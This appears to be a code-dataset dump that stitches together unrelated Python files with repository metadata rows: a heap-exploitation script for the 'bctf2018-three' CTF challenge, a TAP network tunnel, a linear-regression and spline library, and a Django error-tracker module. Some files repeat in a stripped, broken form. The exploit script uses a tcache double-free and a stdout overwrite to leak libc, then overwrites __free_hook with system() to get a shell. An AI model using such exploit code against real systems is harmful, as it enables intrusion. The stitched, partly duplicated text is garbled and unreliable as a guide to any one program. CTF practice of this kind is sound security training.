    def return_unix_seconds(self) -> int:
        """Seconds since the Unix epoch (float-accurate via ms of day)."""
        return self.unix_seconds
    @abstractmethod
    def return_time_string(self) -> str:
        """UTC timestamp formatted as 'YYYY-MM-DD HH:MM:SS.ffffff'."""
        return self.time_string
| 2,246 | 256 | 230 |
3687df8a06dbbc60ca02c86d1b38890d4f87ef48 | 2,230 | py | Python | heap/tcache/bctf2018-three/exp.py | ray-cp/PWN_CATEGORY | c3c69e47846d6e7456b6d11cfcce5d9760288dcf | [
"MIT"
] | 22 | 2019-08-11T03:59:27.000Z | 2022-02-21T10:03:45.000Z | heap/tcache/bctf2018-three/exp.py | ray-cp/PWN_CATEGORY | c3c69e47846d6e7456b6d11cfcce5d9760288dcf | [
"MIT"
] | 1 | 2021-06-02T02:21:42.000Z | 2021-06-02T02:21:42.000Z | heap/tcache/bctf2018-three/exp.py | ray-cp/PWN_CATEGORY | c3c69e47846d6e7456b6d11cfcce5d9760288dcf | [
"MIT"
] | 7 | 2020-01-09T22:46:15.000Z | 2021-08-03T09:56:47.000Z | # File: exp.py
# Author: raycp
# Date: 2019-06-06
# Description: exp for three, uaf to brute force to overwrite stdout to leak libc
from pwn_debug import *
pdbg=pwn_debug("./three")
pdbg.context.terminal=['tmux', 'splitw', '-h']
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")
membp=pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
if __name__ == '__main__':
pwn()
| 20.272727 | 81 | 0.603139 | # File: exp.py
# Author: raycp
# Date: 2019-06-06
# Description: exp for three, uaf to brute force to overwrite stdout to leak libc
from pwn_debug import *
pdbg=pwn_debug("./three")
pdbg.context.terminal=['tmux', 'splitw', '-h']
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")
membp=pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()
def add(content):
    """Menu option 1: allocate a chunk in the target and write *content* into it."""
    p.recvuntil("choice:")
    p.sendline("1")
    # Matches both "Content:" and "content:" prompts.
    p.recvuntil("ontent:")
    p.send(content)
def edit(idx,content):
    """Menu option 2: overwrite the chunk at *idx* with *content*."""
    p.recvuntil("choice:")
    p.sendline("2")
    p.recvuntil(" idx:")
    p.sendline(str(idx))
    p.recvuntil("content:")
    p.send(content)
def delete(idx,choice='n'):
    """Menu option 3: free the chunk at *idx*.

    *choice* answers the program's "(y/n)" confirmation; 'n' leaves the stale
    pointer in place (the use-after-free primitive this exploit relies on).
    """
    p.recvuntil("choice:")
    p.sendline("3")
    p.recvuntil(" idx:")
    p.sendline(str(idx))
    p.recvuntil("(y/n):")
    p.sendline(choice)
def pwn():
    """Exploit chain: tcache double-free -> overlap -> partial-overwrite of
    _IO_2_1_stdout_ to leak libc -> __free_hook = system -> shell.

    Targets glibc 2.27 (tcache, no double-free key check).
    """
    #pdbg.bp()
    add('0')
    add((p64(0x0)+p64(0x11))*4)
    #delete(0)
    delete(1,'y')
    # Double/triple free of index 0 poisons the tcache freelist.
    delete(0)
    delete(0)
    delete(0)
    # Partial overwrite of the fd pointer's low byte redirects the freelist.
    edit(0,p8(0x50))
    add('1')
    # overlap chunk in 2 and 0
    add(p64(0)+p64(0x91)) #2
    # Fill the 0x90 tcache bin so the next free of that size goes to unsorted.
    for i in range(0,7):
        delete(1)
    #pdbg.bp([0xd02,0xb87])
    ## brute force stdout to leak
    edit(2,p64(0)+p64(0x51))
    delete(0,'y')
    edit(2,p64(0)+p64(0x91))
    delete(1,'y')
    stdout_addr=membp.libc_base+libc.symbols['_IO_2_1_stdout_']
    # _IO_write_ptr lives at offset 0x28 inside the FILE struct.
    write_ptr=stdout_addr+0x28
    edit(2,p64(0)+p64(0x51)+p16(write_ptr&0xffff))
    #pdbg.bp(0xb87)
    add('0')
    # Corrupt stdout's write pointer low byte so the next flush leaks heap/libc data.
    add(p8(0xf0)) #1
    p.recv(5)
    leak_addr=u64(p.recv(8))
    libc_base=leak_addr-libc.symbols['_IO_stdfile_1_lock']
    free_hook=libc_base+libc.symbols['__free_hook']
    system_addr=libc_base+libc.symbols['system']
    log.info("leak libc base: %s"%(hex(libc_base)))
    #pdbg.bp([0xd02,0xb87])
    delete(0,'y')
    # Place "/bin/sh" in the chunk and point the freelist at __free_hook.
    edit(2,'/bin/sh\x00'+p64(0x41)+p64(free_hook))
    #pdbg.bp([0xd02,0xb87])
    add('0')
    delete(0,'y')
    # This allocation lands on __free_hook; write system() there.
    add(p64(system_addr))
    # trigger free
    p.recvuntil("choice:")
    p.sendline("3")
    p.recvuntil(" idx:")
    p.sendline('2')
    p.interactive()
if __name__ == '__main__':
pwn()
| 1,602 | 0 | 93 |
fdd6211d40a4db2191c7e6a20b642e398c9bb609 | 1,012 | py | Python | tunnel.py | xiayuu/xtunnel | 3c364133b4562edbbc2df86d4f7e4ce4915de166 | [
"Apache-2.0"
] | null | null | null | tunnel.py | xiayuu/xtunnel | 3c364133b4562edbbc2df86d4f7e4ce4915de166 | [
"Apache-2.0"
] | null | null | null | tunnel.py | xiayuu/xtunnel | 3c364133b4562edbbc2df86d4f7e4ce4915de166 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
import eventlet
import pytun
import os
import sys
eventlet.monkey_patch(all=True)
tap = pytun.open('tap')
os.system("ip link set %s up" % tap.name)
os.system("ip link set dev %s mtu 520" % tap.name)
os.system("ip addr add 192.167.100.1/24 dev %s" % tap.name)
eventlet.spawn_n(handletap)
server = eventlet.listen(('0.0.0.0', 25702))
while True:
try:
new_sock, address = server.accept()
eventlet.spawn_n(handlenet, new_sock)
except (SystemExit, KeyboardInterrupt):
tap.close()
break
| 21.531915 | 60 | 0.572134 | #!/usr/bin/env python
# encoding: utf-8
import eventlet
import pytun
import os
import sys
eventlet.monkey_patch(all=True)
tap = pytun.open('tap')
os.system("ip link set %s up" % tap.name)
os.system("ip link set dev %s mtu 520" % tap.name)
os.system("ip addr add 192.167.100.1/24 dev %s" % tap.name)
def handlenet(sock):
while True:
try:
x = sock.recv(520)
tap.send(x)
except Exception,e:
print(e)
break
def handletap():
    """Read frames from the TAP device and relay them to the remote peer.

    Lazily (re)connects to the host given as sys.argv[1] on port 25702; on any
    send/connect failure the connection is dropped and re-established on the
    next frame. (Python 2 / eventlet green thread.)
    """
    net = None
    while True:
        msg = tap.recv()
        try:
            if not net:
                net = eventlet.connect((sys.argv[1], 25702))
            net.sendall(msg)
        except Exception,e:
            print(e)
            # NOTE(review): the failed socket is dropped without close();
            # relies on GC to reclaim the fd — consider closing explicitly.
            net = None
# Start the TAP->network relay, then accept inbound tunnel connections and
# spawn one network->TAP relay per client. Ctrl-C closes the TAP device.
eventlet.spawn_n(handletap)
server = eventlet.listen(('0.0.0.0', 25702))
while True:
    try:
        new_sock, address = server.accept()
        eventlet.spawn_n(handlenet, new_sock)
    except (SystemExit, KeyboardInterrupt):
        tap.close()
        break
| 400 | 0 | 46 |
0824ffdb3dca3335c54914c58b1c02f0f527cd9b | 15,464 | py | Python | LinearRegression.py | xphter/PythonMachineLearning | 7d763f210152f43d1fad16838762bccd21199762 | [
"MIT"
] | null | null | null | LinearRegression.py | xphter/PythonMachineLearning | 7d763f210152f43d1fad16838762bccd21199762 | [
"MIT"
] | null | null | null | LinearRegression.py | xphter/PythonMachineLearning | 7d763f210152f43d1fad16838762bccd21199762 | [
"MIT"
] | null | null | null | import sys;
import abc;
import math;
import multiprocessing;
import psutil;
import numpy as np;
from scipy.stats import t, f;
import DataHelper;
'''
d
f(x) = Σ βj * x^d
j=0
degree of freedom = d + 1
'''
'''
K
f(x) = β0 + Σβk * I(Ck < x <= Ck+1)
k=1
degree of freedom = K + 1
'''
'''
M-1 K
f(x) = Σ βj * x^(j-1) + Σ θk * (x-ξk)+^(M-1)
j=0 k=1
f, f', f'', ... d^(M-2)f is continuous at ξk, k = 1, 2, ..., K
degree of freedom = K + M
the default is cubic spline with M = 4.
'''
'''
K-2
f = β0 + β1x + Σ θj * (ξK - ξj) * [d(j, x) - d(K-1, x)]
j=1
d(j, x) = [(x - ξj)+^3 - (x - ξK)+^3] / (ξK - ξj)
f''(x) = 0, when x ∈ (-∞, ξ1] ∪ [ξK, ∞)
degree of freedom = K
when K = 1 and 2, f(x) = β0 + β1x.
'''
| 29.455238 | 228 | 0.548564 | import sys;
import abc;
import math;
import multiprocessing;
import psutil;
import numpy as np;
from scipy.stats import t, f;
import DataHelper;
class LinearRegression:
    """Ordinary / weighted least-squares linear regression on numpy matrices.

    ``fit`` computes the coefficient vector and the usual diagnostics
    (sigma, R^2, Cp, AIC, BIC, adjusted R^2, per-coefficient t/p values,
    overall F statistic). Static helpers implement best-subset, forward and
    backward selection plus k-fold cross-validation. X/y are expected to be
    ``np.matrix`` objects; a column of ones (intercept) is prepended
    internally by ``__getX``.
    """
    __DEFAULT_SIG_LEVEL = 0.05;
    @staticmethod
    def calcVIF(X):
        """Variance inflation factor of each column: 1 / (1 - R^2 of regressing it on the rest)."""
        if X is None:
            raise ValueError("matrix X is None");
        return [1 / (1 - LinearRegression().fit(np.delete(X, i, 1), X[:, i]).r2) for i in range(0, X.shape[1])];
    @staticmethod
    def _optimalSubsetsCore(X, y, indices):
        # Fit one candidate column subset; returns (indices, fitted model).
        return indices, LinearRegression().fit(X[:, indices], y);
    @staticmethod
    def optimalSubsets(X, y, m = None):
        """Best-subset selection: for each size k (or only k = m), the subset with minimal RSS.

        Uses a multiprocessing pool when p > 14 and all sizes are requested.
        """
        if X is None or y is None:
            raise ValueError("matrix X or vector y is None");
        result = [];
        p = X.shape[1];
        if m is not None and (m < 1 or m > p):
            raise ValueError("m must be between 1 and column numbers of X");
        # number of models when m is null: 2^p
        if p <= 14 or m is not None:
            result.extend([min([LinearRegression._optimalSubsetsCore(X, y, indices) for indices in DataHelper.combinations(p, k)], key = lambda item: item[1].rss) for k in (range(1, p + 1) if m is None else range(m, m + 1))]);
        else:
            data, models = [], None;
            for k in range(1, p + 1):
                data.extend([(X, y, indices) for indices in DataHelper.combinations(p, k)]);
            # Shuffle the work items so pool chunks get similar-sized subsets.
            data = list(map(tuple, np.array(data, np.object)[DataHelper.randomArrangement(len(data)), :].tolist()));
            with multiprocessing.Pool(max(1, psutil.cpu_count(False) - 2)) as pool:
                models = pool.starmap(LinearRegression._optimalSubsetsCore, data);
            for k in range(1, p + 1):
                result.append(min([item for item in models if len(item[0]) == k], key = lambda item: item[1].rss));
        # result item format: (indices, model)
        return result;
    @staticmethod
    def forwardSelection(X, y):
        """Greedy forward selection: grow the subset one best column at a time."""
        if X is None or y is None:
            raise ValueError("matrix X or vector y is None");
        result = [];
        p = X.shape[1];
        current, leftover = [], list(range(0, p));
        # number of models: p * (p + 1) / 2
        for k in range(1, p + 1):
            result.append(min([(current + [i], LinearRegression().fit(X[:, current + [i]], y)) for i in leftover], key = lambda item: item[1].rss));
            current = result[len(result) - 1][0];
            leftover.remove(current[len(current) - 1]);
        # result item format: (indices, model)
        return result;
    @staticmethod
    def backwardSelection(X, y):
        """Greedy backward selection: start from all columns, drop the worst one each round."""
        if X is None or y is None:
            raise ValueError("matrix X and vector y is None");
        result = [];
        p = X.shape[1];
        leftover = set(range(0, p));
        # number of models: p * (p + 1) / 2
        result.append((list(leftover), LinearRegression().fit(X, y)));
        for k in range(2, p + 1):
            result.append(min([(list(leftover - {i}), LinearRegression().fit(X[:, list(leftover - {i})], y)) for i in leftover], key = lambda item: item[1].rss));
            leftover = set(result[len(result) - 1][0]);
        # result item format: (indices, model)
        return result;
    @staticmethod
    def crossValidation(X, y, k):
        """Pick the best subset size by k-fold CV of test MSE, then refit on all data."""
        if X is None or y is None:
            raise ValueError("matrix X and vector y is None");
        mse = np.mat([list(map(lambda item: item[1].calcMse(testX[:, item[0]], testY), LinearRegression.optimalSubsets(trainX, trainY))) for trainX, trainY, testX, testY in DataHelper.foldOutSampling(X, y, k)]);
        return LinearRegression.optimalSubsets(X, y, np.argmin(mse.mean(0).A.flatten()) + 1)[0];
    def __init__(self):
        # All statistics are filled in by fit(); None until then.
        self.__basisFunctions = None;
        self.__n = None;
        self.__p = None;
        self.__beta = None;
        self.__sigma = None;
        self.__residual = None;
        self.__rss = None;
        self.__r2 = None;
        self.__cp = None;
        self.__aic = None;
        self.__bic = None;
        self.__adjustedR2 = None;
        self.__c = None;
        self.__allF = None;
        self.__allP = None;
        self.__betaStd = None;
        self.__betaT = None;
        self.__betaP = None;
        self.__betaValue = None;
        self.__sigLevel = None;
    def __repr__(self):
        return "y = {0}{1}".format(
            self.__beta[0, 0],
            "".join([" {0} {1} * x{2:.0f}".format("+" if item[0] >= 0 else "-", math.fabs(item[0]), item[1])
                     for item in
                     np.hstack((self.__betaValue, np.mat(range(1, self.__p)).T)).tolist()])
        );
    def __str__(self):
        return "y = β0{0}\r\n{1}\r\n{2}".format(
            "".join(
                [" + β{0:.0f} * x{0:.0f}".format(item) for item in list(range(1, self.__p))]),
            "\r\n".join(
                ["β{0:.0f} = {1}, std = {2}, t-value = {3}, p-value = {4}".format(*item)
                 for item in
                 np.hstack((np.mat(range(0, self.__p)).T, self.__beta, self.__betaStd, self.__betaT, self.__betaP)).tolist()]),
            "σ = {0}, R^2 = {1}, Cp = {2}, AIC = {3}, BIC = {4}, adjusted R^2 = {5}, F-value = {6}, F p-value = {7}".format(self.__sigma, self.__r2, self.__cp, self.__aic, self.__bic, self.__adjustedR2, self.__allF, self.__allP)
        );
    @property
    def beta(self):
        # Coefficients after significance filtering (see sigLevel setter).
        return self.__betaValue;
    @property
    def betaP(self):
        # Two-sided p-value of each coefficient's t statistic.
        return self.__betaP;
    @property
    def sigma(self):
        # Residual standard error sqrt(RSS / (n - p)).
        return self.__sigma;
    @property
    def residual(self):
        return self.__residual;
    @property
    def rss(self):
        return self.__rss;
    @property
    def rssDf(self):
        # Residual degrees of freedom.
        return self.__n - self.__p;
    @property
    def mse(self):
        return self.__rss / self.__n;
    @property
    def r2(self):
        return self.__r2;
    @property
    def cp(self):
        return self.__cp;
    @property
    def aic(self):
        return self.__aic;
    @property
    def bic(self):
        return self.__bic;
    @property
    def adjustedR2(self):
        return self.__adjustedR2;
    @property
    def sigLevel(self):
        return self.__sigLevel;
    @sigLevel.setter
    def sigLevel(self, value):
        # Zero out coefficients whose p-value fails the level; if the overall
        # F test fails, zero the whole model. Original beta stays in __beta.
        if self.__betaP is None or self.__allP is None:
            return;
        if value is None:
            value = LinearRegression.__DEFAULT_SIG_LEVEL;
        self.__sigLevel = value;
        self.__betaValue[(self.__betaP >= value).A.flatten(), :] = 0;
        if self.__allP >= value:
            self.__betaValue[:, :] = 0;
    def __getX(self, X):
        # Expand columns through their basis functions (if any) and prepend
        # the intercept column of ones.
        dataSet = X;
        if self.__basisFunctions is not None and any(self.__basisFunctions):
            sets = tuple([item for item in [self.__basisFunctions[j].getX(X[:, j]) if self.__basisFunctions[j] is not None else X[:, j] for j in range(X.shape[1])] if item is not None]);
            if len(sets) > 0:
                dataSet = np.hstack(sets);
            else:
                dataSet = np.mat(np.empty((X.shape[0], 0)));
        return np.hstack((np.mat(np.ones((dataSet.shape[0], 1))), dataSet));
    def __getP(self, value, degree):
        # Two-sided p-value of a t statistic with the given degrees of freedom.
        if isinstance(value, np.matrix):
            return np.mat(2 * (1 - t.cdf(np.abs(value.A.flatten()), degree))).T;
        else:
            return 2 * (1 - t.cdf(math.fabs(value), degree));
    def __predict(self, X):
        return X * self.__betaValue;
    def fit(self, X, y, baseFunctions = None, w = None):
        """Fit (weighted) least squares and compute all diagnostics; returns self.

        :param X: n-by-p design matrix (np.matrix), without intercept column
        :param y: n-by-1 response vector
        :param baseFunctions: optional per-column IBasisFunction list
        :param w: optional length-n observation weight vector
        """
        # w is the weight vector
        if X is None or y is None:
            raise ValueError("matrix X or vector y is None");
        if baseFunctions is not None and len(baseFunctions) != X.shape[1]:
            raise ValueError("the length of base functions must be equals to column numbers of X");
        if w is not None and w.shape[0] != X.shape[0]:
            raise ValueError("the length of weight vector must be equals to row numbers of X");
        self.__basisFunctions = baseFunctions;
        X = self.__getX(X);
        n, p = X.shape;
        W = np.diag(w) if w is not None else np.identity(n);
        A = X.T * W * X;
        # Fall back to the pseudo-inverse when X'WX is (numerically) singular.
        if np.linalg.matrix_rank(A, tol = 1e-8) == A.shape[0]:
            C = A.I;
        else:
            C = np.linalg.pinv(A);
        self.__n = n;
        self.__p = p;
        self.__beta = C * X.T * W * y;
        centralizedY = y - y.mean();
        residual = y - X * self.__beta;
        rss = (residual.T * residual)[0, 0];
        tss = (centralizedY.T * centralizedY)[0, 0];
        sigma2 = rss / (n - p);
        self.__sigma = math.sqrt(sigma2);
        self.__residual = residual;
        self.__rss = rss;
        self.__r2 = 1 - rss / tss if tss != 0 else 0;
        self.__cp = (rss + 2 * (p - 1) * sigma2) / n;
        # self.__aic = (rss + 2 * (p - 1) * sigma2) / (n * sigma2) + math.log(2 * math.pi * sigma2);
        # self.__bic = (rss + math.log(n) * (p - 1) * sigma2) / (n * sigma2) + math.log(2 * math.pi * sigma2);
        self.__aic = 2 * (p - 1) + n - p + n * math.log(2 * math.pi * sigma2) if sigma2 > 0 else -sys.maxsize;
        self.__bic = math.log(n) * (p - 1) + n - p + n * math.log(2 * math.pi * sigma2) if sigma2 > 0 else -sys.maxsize;
        self.__adjustedR2 = 1 - (rss / (n - p)) / (tss / (n - 1)) if tss != 0 else 0;
        self.__c = C;
        self.__betaStd = self.__sigma * np.sqrt(C.diagonal().T);
        self.__betaT = np.divide(self.__beta, self.__betaStd) if self.__sigma != 0 else np.ones_like(self.__beta) * sys.maxsize;
        self.__betaP = self.__getP(self.__betaT, n - p);
        self.__betaValue = self.__beta.copy();
        self.__allF = ((tss - rss) / (p - 1) / sigma2 if sigma2 != 0 else sys.maxsize) if p > 1 else 0;
        self.__allP = 1 - f.cdf(self.__allF, p - 1, n - p) if p > 1 else 1;
        return self;
    def predictValue(self, X):
        """Point predictions for the rows of X (basis expansion applied internally)."""
        if X is None:
            raise ValueError("matrix X is None");
        return self.__predict(self.__getX(X));
    def predictInterval(self, X, confidence = None, prediction = True):
        """Prediction (or mean-confidence, when prediction=False) intervals.

        Returns an n-by-3 matrix of [lower, point, upper] per row of X.
        """
        if X is None:
            raise ValueError("matrix X is None");
        if confidence is not None and (confidence <= 0 or confidence >= 1):
            raise ValueError("the confidence must be between 0 and 1");
        X = self.__getX(X);
        alpha = 1 - confidence if confidence is not None else LinearRegression.__DEFAULT_SIG_LEVEL;
        tValue = t.ppf(1 - alpha / 2, self.__n - self.__p);
        # The leading 1 adds the irreducible-error term for prediction intervals.
        interval = np.sqrt((1 if prediction else 0) + np.multiply(X * self.__c, X).sum(1)) * self.__sigma * tValue;
        value = self.__predict(X);
        return np.mat(np.hstack((value - interval, value, value + interval)));
    def calcRss(self, X, y):
        """Residual sum of squares of the fitted model on new data (X, y)."""
        if X is None or y is None:
            raise ValueError("matrix X or vector y is None");
        residual = y - self.predictValue(X);
        return (residual.T * residual)[0, 0];
    def calcMse(self, X, y):
        """Mean squared error of the fitted model on new data (X, y)."""
        if X is None or y is None:
            raise ValueError("matrix X or vector y is None");
        return self.calcRss(X, y) / X.shape[0];
class IBasisFunction(metaclass = abc.ABCMeta):
    """Interface of a one-column basis expansion used by LinearRegression.fit."""
    @property
    @abc.abstractmethod
    def df(self):
        # Degrees of freedom contributed by this expansion (intercept excluded).
        pass;
    @abc.abstractmethod
    def getX(self, x):
        # Expand column vector x into its basis columns (or None for an
        # expansion that contributes no columns).
        pass;
'''
d
f(x) = Σ βj * x^d
j=0
degree of freedom = d + 1
'''
class PolynomialFunction(IBasisFunction):
    """Polynomial basis of degree d: columns x, x^2, ..., x^d."""
    # df excludes intercept
    def __init__(self, df):
        if df < 0:
            raise ValueError("df is at least 0");
        self.__d = df;
    @property
    def df(self):
        return self.__d;
    def getX(self, x):
        # Degree 0 contributes no columns (the intercept is added elsewhere).
        if x is None:
            raise ValueError("vector x is None");
        return DataHelper.vectorPoly(x, self.__d) if self.__d > 0 else None;
class KnottedFunction(IBasisFunction, metaclass = abc.ABCMeta):
    """Base for knot-based bases; knots are given explicitly or placed at
    equally spaced quantiles of the data on first use."""
    def __init__(self, k = None, knots = None):
        if k is None and knots is None:
            raise ValueError("at least one of k and knots cannot be None");
        if k is not None and k < 0:
            raise ValueError("k is at least 0");
        if knots is not None and not isinstance(knots, list):
            raise ValueError("knots must be a list");
        # Explicit knots take precedence over a knot count.
        if knots is not None:
            self._K = len(knots);
            self._knots = knots;
        else:
            self._K = k;
            self._knots = None;
    @property
    def knots(self):
        return self._knots;
    def _findKnots(self, x):
        # Place K knots at the i/(K+1) quantiles of x, i = 1..K.
        self._knots = [np.quantile(x, k / (self._K + 1), 0)[0] for k in range(1, self._K + 1)] if self._K > 0 else [];
    @abc.abstractmethod
    def _getX(self, x):
        # Subclass hook: build the basis columns once knots are available.
        pass;
    def getX(self, x):
        # Lazily derive the knots from the first data seen, then delegate.
        if x is None:
            raise ValueError("vector x is None");
        if self._knots is None:
            self._findKnots(x);
        return self._getX(x);
'''
K
f(x) = β0 + Σβk * I(Ck < x <= Ck+1)
k=1
degree of freedom = K + 1
'''
class StepFunction(KnottedFunction):
    """Piecewise-constant basis: K indicator columns I(C_k < x <= C_{k+1}),
    with the last interval open to the right. Degree of freedom = K
    (intercept excluded)."""
    # df excludes intercept
    def __init__(self, df = None, knots = None):
        if df is not None and df < 0:
            # BUG FIX: the original raised `Value(...)`, an undefined name that
            # would itself crash with NameError instead of reporting the error.
            raise ValueError("df is at least 0");
        super().__init__(df, knots);
    @property
    def df(self):
        return self._K;
    def _getX(self, x):
        # One indicator column per knot interval; the final interval is x > last knot.
        return np.hstack(tuple([(np.logical_and(x > self._knots[i], x <= self._knots[i + 1]) if i < len(self._knots) - 1 else x > self._knots[i]) - 0 for i in range(0, self._K)])) if self._K > 0 else None;
'''
M-1 K
f(x) = Σ βj * x^(j-1) + Σ θk * (x-ξk)+^(M-1)
j=0 k=1
f, f', f'', ... d^(M-2)f is continuous at ξk, k = 1, 2, ..., K
degree of freedom = K + M
the default is cubic spline with M = 4.
'''
class RegressionSplineFunction(KnottedFunction):
    """Order-M regression spline: polynomial of degree M-1 plus K truncated
    power columns (x - ξ_k)_+^{M-1}. Default M = 4 gives a cubic spline;
    degree of freedom = K + M - 1 columns (intercept excluded)."""
    # df excludes intercept
    def __init__(self, df = None, m = 4, knots = None):
        if m < 1:
            raise ValueError("m is at least 1");
        # K = df + 1 - m knots (clamped at 0) when df is given.
        super().__init__(max(df + 1 - m, 0) if df is not None else None, knots);
        self.__d = m - 1;
    @property
    def df(self):
        return self._K + self.__d;
    def _getX(self, x):
        # Polynomial columns first, then one truncated power column per knot.
        if self._K > 0:
            Y = np.hstack(tuple([DataHelper.truncatedPower(x, self._knots[k], self.__d) for k in range(0, self._K)]));
            return np.hstack((DataHelper.vectorPoly(x, self.__d), Y)) if self.__d > 0 else Y;
        else:
            return DataHelper.vectorPoly(x, self.__d) if self.__d > 0 else None;
'''
K-2
f = β0 + β1x + Σ θj * (ξK - ξj) * [d(j, x) - d(K-1, x)]
j=1
d(j, x) = [(x - ξj)+^3 - (x - ξK)+^3] / (ξK - ξj)
f''(x) = 0, when x ∈ (-∞, ξ1] ∪ [ξK, ∞)
degree of freedom = K
when K = 1 and 2, f(x) = β0 + β1x.
'''
class NatureCubicSplineFunction(KnottedFunction):
    """Natural cubic spline basis: linear beyond the boundary knots
    (f'' = 0 outside [ξ_1, ξ_K]); degree of freedom = K - 1 columns.
    With K <= 2 knots it degenerates to the linear column x."""
    # df excludes intercept
    def __init__(self, df = None, knots = None):
        # K = df + 1 knots (clamped at 0) when df is given.
        super().__init__(max(df + 1, 0) if df is not None else None, knots);
    @property
    def df(self):
        return self._K - 1;
    def __d(self, k, x):
        # d(k, x) = [(x-ξ_k)_+^3 - (x-ξ_K)_+^3] / (ξ_K - ξ_k), the natural-spline
        # building block.
        return (DataHelper.truncatedPower(x, self._knots[k], 3) - DataHelper.truncatedPower(x, self._knots[self._K - 1], 3)) / (self._knots[self._K - 1] - self._knots[k]);
    def _getX(self, x):
        # Columns: x plus (ξ_K - ξ_j)(d(j,x) - d(K-1,x)) for j = 1..K-2.
        if self._K > 2:
            dK_1 = self.__d(self._K - 2, x);
            return np.hstack(tuple([x] + [(self._knots[self._K - 1] - self.knots[k]) * (self.__d(k, x) - dK_1) for k in range(0, self._K - 2)]));
        else:
            return x;
| 12,306 | 2,186 | 161 |
0d6c94634144c4ffc67edce361e3600a5bfddde3 | 2,741 | py | Python | error_tracker/django/__init__.py | Laneglos/error-tracker | b07366e94199fc5157ddc5623fa12c8c0d07c483 | [
"BSD-3-Clause"
] | 16 | 2019-12-17T10:57:43.000Z | 2022-01-30T13:03:53.000Z | error_tracker/django/__init__.py | Laneglos/error-tracker | b07366e94199fc5157ddc5623fa12c8c0d07c483 | [
"BSD-3-Clause"
] | 15 | 2020-01-08T12:08:32.000Z | 2022-01-28T13:16:48.000Z | error_tracker/django/__init__.py | Laneglos/error-tracker | b07366e94199fc5157ddc5623fa12c8c0d07c483 | [
"BSD-3-Clause"
] | 8 | 2020-01-08T14:10:14.000Z | 2021-01-31T22:26:07.000Z | # -*- coding: utf-8 -*-
#
# Django components
#
# :copyright: 2020 Sonu Kumar
# :license: BSD-3-Clause
#
from .utils import DefaultDjangoContextBuilder, DjangoNotification, DefaultDjangoViewPermission
from .settings import *
from .utils import DjangoNotification, DefaultDjangoContextBuilder
from error_tracker.libs.utils import Masking, get_class_from_path, get_class_instance
from error_tracker import ModelMixin, MaskingMixin, TicketingMixin, NotificationMixin, ContextBuilderMixin, \
ViewPermissionMixin
from django.apps import apps as django_apps
import warnings
def get_exception_model():
"""
Return the APP error model that is active in this project.
"""
from .models import ErrorModel
model_path = APP_ERROR_DB_MODEL
if model_path is None:
warnings.warn("APP_ERROR_DB_MODEL is not set using default model")
return ErrorModel
try:
return django_apps.get_model(model_path, require_ready=False)
except ValueError:
model = get_class_from_path(model_path, ModelMixin, raise_exception=False,
warning_message="Model " + model_path + " is not importable")
if model is not None:
return model
warnings.warn("APP_ERROR_DB_MODEL must be of the form 'app_label.model_name'")
except LookupError:
model = get_class_from_path(model_path, ModelMixin, raise_exception=False,
warning_message="Model " + model_path + " is not importable")
if model is not None:
return model
warnings.warn(
"APP_ERROR_DB_MODEL refers to model '%s' that has not been installed" % model_path
)
raise LookupError("APP_ERROR_DB_MODEL is set to '%s' but it's not importable" % model_path)
| 38.069444 | 110 | 0.708501 | # -*- coding: utf-8 -*-
#
# Django components
#
# :copyright: 2020 Sonu Kumar
# :license: BSD-3-Clause
#
from .utils import DefaultDjangoContextBuilder, DjangoNotification, DefaultDjangoViewPermission
from .settings import *
from .utils import DjangoNotification, DefaultDjangoContextBuilder
from error_tracker.libs.utils import Masking, get_class_from_path, get_class_instance
from error_tracker import ModelMixin, MaskingMixin, TicketingMixin, NotificationMixin, ContextBuilderMixin, \
ViewPermissionMixin
from django.apps import apps as django_apps
import warnings
def get_exception_model():
    """
    Return the APP error model that is active in this project.

    Resolution order:
      1. ``APP_ERROR_DB_MODEL`` unset -> the bundled ``ErrorModel`` (with a warning).
      2. ``django_apps.get_model`` with the configured path.
      3. On failure, try the path as a dotted import of a ``ModelMixin``
         subclass; otherwise warn and finally raise ``LookupError``.
    """
    from .models import ErrorModel
    model_path = APP_ERROR_DB_MODEL
    if model_path is None:
        warnings.warn("APP_ERROR_DB_MODEL is not set using default model")
        return ErrorModel
    try:
        return django_apps.get_model(model_path, require_ready=False)
    except ValueError:
        # Not an "app_label.model_name" string — it may still be a dotted
        # import path to a custom model class.
        model = get_class_from_path(model_path, ModelMixin, raise_exception=False,
                                    warning_message="Model " + model_path + " is not importable")
        if model is not None:
            return model
        warnings.warn("APP_ERROR_DB_MODEL must be of the form 'app_label.model_name'")
    except LookupError:
        # Well-formed, but no such installed model — fall back to import path.
        model = get_class_from_path(model_path, ModelMixin, raise_exception=False,
                                    warning_message="Model " + model_path + " is not importable")
        if model is not None:
            return model
        warnings.warn(
            "APP_ERROR_DB_MODEL refers to model '%s' that has not been installed" % model_path
        )
    raise LookupError("APP_ERROR_DB_MODEL is set to '%s' but it's not importable" % model_path)
def get_masking_module():
    """Return the configured masking helper (defaults to ``Masking``)."""
    return get_class_instance(APP_ERROR_MASKING_MODULE, MaskingMixin, Masking, 'Masking', APP_ERROR_MASK_WITH,
                              APP_ERROR_MASKED_KEY_HAS)
def get_ticketing_module():
    """Return the configured ticketing helper, or None when unconfigured."""
    return get_class_instance(APP_ERROR_TICKETING_MODULE, TicketingMixin, None, 'Ticketing')
def get_notification_module():
    """Return the notification helper; None unless both recipient and
    sender e-mail settings are present."""
    if APP_ERROR_RECIPIENT_EMAIL and APP_ERROR_EMAIL_SENDER:
        return get_class_instance(APP_ERROR_NOTIFICATION_MODULE, NotificationMixin, DjangoNotification,
                                  "Notification")
def get_context_builder():
    """Return the request-context builder (defaults to the Django one)."""
    return get_class_instance(APP_ERROR_CONTEXT_BUILDER_MODULE, ContextBuilderMixin,
                              DefaultDjangoContextBuilder, "ContextBuilder")
def get_view_permission():
    """Return the view-permission checker (defaults to the Django one)."""
    return get_class_instance(APP_ERROR_VIEW_PERMISSION, ViewPermissionMixin, DefaultDjangoViewPermission,
                              "ViewPermission")
